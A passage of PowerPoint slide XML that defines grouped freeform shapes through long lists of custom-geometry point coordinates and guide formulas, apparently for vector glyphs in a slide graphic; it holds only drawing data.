                    <a:lnTo>
                      <a:pt x="2168" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="1537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="1537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3969" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3969" y="3040"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7202" y="1002"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6499" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7202" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7202" y="1002"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2766" y="2435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2168" y="2435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="2435"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3066" y="2435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="2435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="243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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="137" name="Group 136"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="164480" y="1944859"/>
                <a:ext cx="2297507" cy="1941996"/>
                <a:chOff x="5356225" y="4513263"/>
                <a:chExt cx="2328863" cy="1968500"/>
              </a:xfrm>
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="138" name="Freeform 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5356225" y="6210300"/>
                  <a:ext cx="177800" cy="271463"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 225 w 494"/>
                    <a:gd name="T1" fmla="*/ 641 h 752"/>
                    <a:gd name="T2" fmla="*/ 283 w 494"/>
                    <a:gd name="T3" fmla="*/ 651 h 752"/>
                    <a:gd name="T4" fmla="*/ 325 w 494"/>
                    <a:gd name="T5" fmla="*/ 635 h 752"/>
                    <a:gd name="T6" fmla="*/ 346 w 494"/>
                    <a:gd name="T7" fmla="*/ 604 h 752"/>
                    <a:gd name="T8" fmla="*/ 352 w 494"/>
                    <a:gd name="T9" fmla="*/ 567 h 752"/>
                    <a:gd name="T10" fmla="*/ 346 w 494"/>
                    <a:gd name="T11" fmla="*/ 520 h 752"/>
                    <a:gd name="T12" fmla="*/ 325 w 494"/>
                    <a:gd name="T13" fmla="*/ 451 h 752"/>
                    <a:gd name="T14" fmla="*/ 299 w 494"/>
                    <a:gd name="T15" fmla="*/ 420 h 752"/>
                    <a:gd name="T16" fmla="*/ 257 w 494"/>
                    <a:gd name="T17" fmla="*/ 409 h 752"/>
                    <a:gd name="T18" fmla="*/ 168 w 494"/>
                    <a:gd name="T19" fmla="*/ 320 h 752"/>
                    <a:gd name="T20" fmla="*/ 236 w 494"/>
                    <a:gd name="T21" fmla="*/ 310 h 752"/>
                    <a:gd name="T22" fmla="*/ 262 w 494"/>
                    <a:gd name="T23" fmla="*/ 284 h 752"/>
                    <a:gd name="T24" fmla="*/ 278 w 494"/>
                    <a:gd name="T25" fmla="*/ 252 h 752"/>
                    <a:gd name="T26" fmla="*/ 278 w 494"/>
                    <a:gd name="T27" fmla="*/ 184 h 752"/>
                    <a:gd name="T28" fmla="*/ 262 w 494"/>
                    <a:gd name="T29" fmla="*/ 126 h 752"/>
                    <a:gd name="T30" fmla="*/ 242 w 494"/>
                    <a:gd name="T31" fmla="*/ 105 h 752"/>
                    <a:gd name="T32" fmla="*/ 194 w 494"/>
                    <a:gd name="T33" fmla="*/ 100 h 752"/>
                    <a:gd name="T34" fmla="*/ 157 w 494"/>
                    <a:gd name="T35" fmla="*/ 115 h 752"/>
                    <a:gd name="T36" fmla="*/ 136 w 494"/>
                    <a:gd name="T37" fmla="*/ 142 h 752"/>
                    <a:gd name="T38" fmla="*/ 131 w 494"/>
                    <a:gd name="T39" fmla="*/ 184 h 752"/>
                    <a:gd name="T40" fmla="*/ 5 w 494"/>
                    <a:gd name="T41" fmla="*/ 252 h 752"/>
                    <a:gd name="T42" fmla="*/ 10 w 494"/>
                    <a:gd name="T43" fmla="*/ 115 h 752"/>
                    <a:gd name="T44" fmla="*/ 58 w 494"/>
                    <a:gd name="T45" fmla="*/ 53 h 752"/>
                    <a:gd name="T46" fmla="*/ 183 w 494"/>
                    <a:gd name="T47" fmla="*/ 5 h 752"/>
                    <a:gd name="T48" fmla="*/ 272 w 494"/>
                    <a:gd name="T49" fmla="*/ 0 h 752"/>
                    <a:gd name="T50" fmla="*/ 346 w 494"/>
                    <a:gd name="T51" fmla="*/ 26 h 752"/>
                    <a:gd name="T52" fmla="*/ 409 w 494"/>
                    <a:gd name="T53" fmla="*/ 115 h 752"/>
                    <a:gd name="T54" fmla="*/ 425 w 494"/>
                    <a:gd name="T55" fmla="*/ 189 h 752"/>
                    <a:gd name="T56" fmla="*/ 409 w 494"/>
                    <a:gd name="T57" fmla="*/ 268 h 752"/>
                    <a:gd name="T58" fmla="*/ 378 w 494"/>
                    <a:gd name="T59" fmla="*/ 310 h 752"/>
                    <a:gd name="T60" fmla="*/ 336 w 494"/>
                    <a:gd name="T61" fmla="*/ 336 h 752"/>
                    <a:gd name="T62" fmla="*/ 399 w 494"/>
                    <a:gd name="T63" fmla="*/ 347 h 752"/>
                    <a:gd name="T64" fmla="*/ 446 w 494"/>
                    <a:gd name="T65" fmla="*/ 378 h 752"/>
                    <a:gd name="T66" fmla="*/ 483 w 494"/>
                    <a:gd name="T67" fmla="*/ 457 h 752"/>
                    <a:gd name="T68" fmla="*/ 493 w 494"/>
                    <a:gd name="T69" fmla="*/ 525 h 752"/>
                    <a:gd name="T70" fmla="*/ 488 w 494"/>
                    <a:gd name="T71" fmla="*/ 604 h 752"/>
                    <a:gd name="T72" fmla="*/ 441 w 494"/>
                    <a:gd name="T73" fmla="*/ 677 h 752"/>
                    <a:gd name="T74" fmla="*/ 383 w 494"/>
                    <a:gd name="T75" fmla="*/ 719 h 752"/>
                    <a:gd name="T76" fmla="*/ 283 w 494"/>
                    <a:gd name="T77" fmla="*/ 745 h 752"/>
                    <a:gd name="T78" fmla="*/ 152 w 494"/>
                    <a:gd name="T79" fmla="*/ 735 h 752"/>
                    <a:gd name="T80" fmla="*/ 89 w 494"/>
                    <a:gd name="T81" fmla="*/ 682 h 752"/>
                    <a:gd name="T82" fmla="*/ 42 w 494"/>
                    <a:gd name="T83" fmla="*/ 556 h 752"/>
                    <a:gd name="T84" fmla="*/ 178 w 494"/>
                    <a:gd name="T85" fmla="*/ 530 h 7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94" h="752">
                      <a:moveTo>
                        <a:pt x="215" y="625"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="215" y="625"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="641"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="304" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="315" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="315" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="284"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="53"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="367" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="399" y="347"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="425"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="677"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="719"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="751"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="735"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="714"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="714"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="682"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="36" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="625"/>
                      </a:ln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9" name="Freeform 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5568950" y="6384925"/>
                  <a:ext cx="60325" cy="68263"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 168 w 169"/>
                    <a:gd name="T1" fmla="*/ 163 h 190"/>
                    <a:gd name="T2" fmla="*/ 37 w 169"/>
                    <a:gd name="T3" fmla="*/ 189 h 190"/>
                    <a:gd name="T4" fmla="*/ 0 w 169"/>
                    <a:gd name="T5" fmla="*/ 32 h 190"/>
                    <a:gd name="T6" fmla="*/ 137 w 169"/>
                    <a:gd name="T7" fmla="*/ 0 h 190"/>
                    <a:gd name="T8" fmla="*/ 168 w 169"/>
                    <a:gd name="T9" fmla="*/ 163 h 1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9" h="190">
                      <a:moveTo>
                        <a:pt x="168" y="163"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="37" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="163"/>
                      </a:ln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0" name="Freeform 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5692775" y="6080125"/>
                  <a:ext cx="307975" cy="328613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 210 w 857"/>
                    <a:gd name="T1" fmla="*/ 136 h 914"/>
                    <a:gd name="T2" fmla="*/ 478 w 857"/>
                    <a:gd name="T3" fmla="*/ 603 h 914"/>
                    <a:gd name="T4" fmla="*/ 478 w 857"/>
                    <a:gd name="T5" fmla="*/ 603 h 914"/>
                    <a:gd name="T6" fmla="*/ 415 w 857"/>
                    <a:gd name="T7" fmla="*/ 73 h 914"/>
                    <a:gd name="T8" fmla="*/ 625 w 857"/>
                    <a:gd name="T9" fmla="*/ 0 h 914"/>
                    <a:gd name="T10" fmla="*/ 856 w 857"/>
                    <a:gd name="T11" fmla="*/ 709 h 914"/>
                    <a:gd name="T12" fmla="*/ 725 w 857"/>
                    <a:gd name="T13" fmla="*/ 750 h 914"/>
                    <a:gd name="T14" fmla="*/ 541 w 857"/>
                    <a:gd name="T15" fmla="*/ 189 h 914"/>
                    <a:gd name="T16" fmla="*/ 541 w 857"/>
                    <a:gd name="T17" fmla="*/ 189 h 914"/>
                    <a:gd name="T18" fmla="*/ 599 w 857"/>
                    <a:gd name="T19" fmla="*/ 793 h 914"/>
                    <a:gd name="T20" fmla="*/ 488 w 857"/>
                    <a:gd name="T21" fmla="*/ 829 h 914"/>
                    <a:gd name="T22" fmla="*/ 179 w 857"/>
                    <a:gd name="T23" fmla="*/ 304 h 914"/>
                    <a:gd name="T24" fmla="*/ 179 w 857"/>
                    <a:gd name="T25" fmla="*/ 304 h 914"/>
                    <a:gd name="T26" fmla="*/ 363 w 857"/>
                    <a:gd name="T27" fmla="*/ 871 h 914"/>
                    <a:gd name="T28" fmla="*/ 231 w 857"/>
                    <a:gd name="T29" fmla="*/ 913 h 914"/>
                    <a:gd name="T30" fmla="*/ 0 w 857"/>
                    <a:gd name="T31" fmla="*/ 205 h 914"/>
                    <a:gd name="T32" fmla="*/ 210 w 857"/>
                    <a:gd name="T33" fmla="*/ 136 h 9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857" h="914">
                      <a:moveTo>
                        <a:pt x="210" y="136"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="856" y="709"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="725" y="750"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="599" y="793"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="871"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="913"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="136"/>
                      </a:ln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1" name="Freeform 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5986463" y="6086475"/>
                  <a:ext cx="203200" cy="222250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 21 w 563"/>
                    <a:gd name="T1" fmla="*/ 268 h 616"/>
                    <a:gd name="T2" fmla="*/ 0 w 563"/>
                    <a:gd name="T3" fmla="*/ 184 h 616"/>
                    <a:gd name="T4" fmla="*/ 5 w 563"/>
                    <a:gd name="T5" fmla="*/ 153 h 616"/>
                    <a:gd name="T6" fmla="*/ 16 w 563"/>
                    <a:gd name="T7" fmla="*/ 121 h 616"/>
                    <a:gd name="T8" fmla="*/ 63 w 563"/>
                    <a:gd name="T9" fmla="*/ 69 h 616"/>
                    <a:gd name="T10" fmla="*/ 95 w 563"/>
                    <a:gd name="T11" fmla="*/ 48 h 616"/>
                    <a:gd name="T12" fmla="*/ 132 w 563"/>
                    <a:gd name="T13" fmla="*/ 32 h 616"/>
                    <a:gd name="T14" fmla="*/ 231 w 563"/>
                    <a:gd name="T15" fmla="*/ 0 h 616"/>
                    <a:gd name="T16" fmla="*/ 268 w 563"/>
                    <a:gd name="T17" fmla="*/ 0 h 616"/>
                    <a:gd name="T18" fmla="*/ 299 w 563"/>
                    <a:gd name="T19" fmla="*/ 11 h 616"/>
                    <a:gd name="T20" fmla="*/ 352 w 563"/>
                    <a:gd name="T21" fmla="*/ 48 h 616"/>
                    <a:gd name="T22" fmla="*/ 368 w 563"/>
                    <a:gd name="T23" fmla="*/ 74 h 616"/>
                    <a:gd name="T24" fmla="*/ 499 w 563"/>
                    <a:gd name="T25" fmla="*/ 378 h 616"/>
                    <a:gd name="T26" fmla="*/ 530 w 563"/>
                    <a:gd name="T27" fmla="*/ 431 h 616"/>
                    <a:gd name="T28" fmla="*/ 562 w 563"/>
                    <a:gd name="T29" fmla="*/ 473 h 616"/>
                    <a:gd name="T30" fmla="*/ 436 w 563"/>
                    <a:gd name="T31" fmla="*/ 525 h 616"/>
                    <a:gd name="T32" fmla="*/ 415 w 563"/>
                    <a:gd name="T33" fmla="*/ 505 h 616"/>
                    <a:gd name="T34" fmla="*/ 394 w 563"/>
                    <a:gd name="T35" fmla="*/ 478 h 616"/>
                    <a:gd name="T36" fmla="*/ 383 w 563"/>
                    <a:gd name="T37" fmla="*/ 520 h 616"/>
                    <a:gd name="T38" fmla="*/ 363 w 563"/>
                    <a:gd name="T39" fmla="*/ 552 h 616"/>
                    <a:gd name="T40" fmla="*/ 331 w 563"/>
                    <a:gd name="T41" fmla="*/ 578 h 616"/>
                    <a:gd name="T42" fmla="*/ 289 w 563"/>
                    <a:gd name="T43" fmla="*/ 599 h 616"/>
                    <a:gd name="T44" fmla="*/ 226 w 563"/>
                    <a:gd name="T45" fmla="*/ 615 h 616"/>
                    <a:gd name="T46" fmla="*/ 199 w 563"/>
                    <a:gd name="T47" fmla="*/ 609 h 616"/>
                    <a:gd name="T48" fmla="*/ 173 w 563"/>
                    <a:gd name="T49" fmla="*/ 594 h 616"/>
                    <a:gd name="T50" fmla="*/ 132 w 563"/>
                    <a:gd name="T51" fmla="*/ 557 h 616"/>
                    <a:gd name="T52" fmla="*/ 116 w 563"/>
                    <a:gd name="T53" fmla="*/ 536 h 616"/>
                    <a:gd name="T54" fmla="*/ 105 w 563"/>
                    <a:gd name="T55" fmla="*/ 510 h 616"/>
                    <a:gd name="T56" fmla="*/ 84 w 563"/>
                    <a:gd name="T57" fmla="*/ 441 h 616"/>
                    <a:gd name="T58" fmla="*/ 84 w 563"/>
                    <a:gd name="T59" fmla="*/ 415 h 616"/>
                    <a:gd name="T60" fmla="*/ 89 w 563"/>
                    <a:gd name="T61" fmla="*/ 389 h 616"/>
                    <a:gd name="T62" fmla="*/ 116 w 563"/>
                    <a:gd name="T63" fmla="*/ 337 h 616"/>
                    <a:gd name="T64" fmla="*/ 137 w 563"/>
                    <a:gd name="T65" fmla="*/ 315 h 616"/>
                    <a:gd name="T66" fmla="*/ 231 w 563"/>
                    <a:gd name="T67" fmla="*/ 242 h 616"/>
                    <a:gd name="T68" fmla="*/ 252 w 563"/>
                    <a:gd name="T69" fmla="*/ 221 h 616"/>
                    <a:gd name="T70" fmla="*/ 263 w 563"/>
                    <a:gd name="T71" fmla="*/ 200 h 616"/>
                    <a:gd name="T72" fmla="*/ 257 w 563"/>
                    <a:gd name="T73" fmla="*/ 158 h 616"/>
                    <a:gd name="T74" fmla="*/ 242 w 563"/>
                    <a:gd name="T75" fmla="*/ 132 h 616"/>
                    <a:gd name="T76" fmla="*/ 221 w 563"/>
                    <a:gd name="T77" fmla="*/ 116 h 616"/>
                    <a:gd name="T78" fmla="*/ 199 w 563"/>
                    <a:gd name="T79" fmla="*/ 111 h 616"/>
                    <a:gd name="T80" fmla="*/ 168 w 563"/>
                    <a:gd name="T81" fmla="*/ 121 h 616"/>
                    <a:gd name="T82" fmla="*/ 137 w 563"/>
                    <a:gd name="T83" fmla="*/ 147 h 616"/>
                    <a:gd name="T84" fmla="*/ 132 w 563"/>
                    <a:gd name="T85" fmla="*/ 158 h 616"/>
                    <a:gd name="T86" fmla="*/ 137 w 563"/>
                    <a:gd name="T87" fmla="*/ 216 h 616"/>
                    <a:gd name="T88" fmla="*/ 26 w 563"/>
                    <a:gd name="T89" fmla="*/ 279 h 616"/>
                    <a:gd name="T90" fmla="*/ 284 w 563"/>
                    <a:gd name="T91" fmla="*/ 305 h 616"/>
                    <a:gd name="T92" fmla="*/ 263 w 563"/>
                    <a:gd name="T93" fmla="*/ 326 h 616"/>
                    <a:gd name="T94" fmla="*/ 231 w 563"/>
                    <a:gd name="T95" fmla="*/ 352 h 616"/>
                    <a:gd name="T96" fmla="*/ 216 w 563"/>
                    <a:gd name="T97" fmla="*/ 378 h 616"/>
                    <a:gd name="T98" fmla="*/ 226 w 563"/>
                    <a:gd name="T99" fmla="*/ 441 h 616"/>
                    <a:gd name="T100" fmla="*/ 236 w 563"/>
                    <a:gd name="T101" fmla="*/ 468 h 616"/>
                    <a:gd name="T102" fmla="*/ 257 w 563"/>
                    <a:gd name="T103" fmla="*/ 484 h 616"/>
                    <a:gd name="T104" fmla="*/ 279 w 563"/>
                    <a:gd name="T105" fmla="*/ 494 h 616"/>
                    <a:gd name="T106" fmla="*/ 305 w 563"/>
                    <a:gd name="T107" fmla="*/ 489 h 616"/>
                    <a:gd name="T108" fmla="*/ 331 w 563"/>
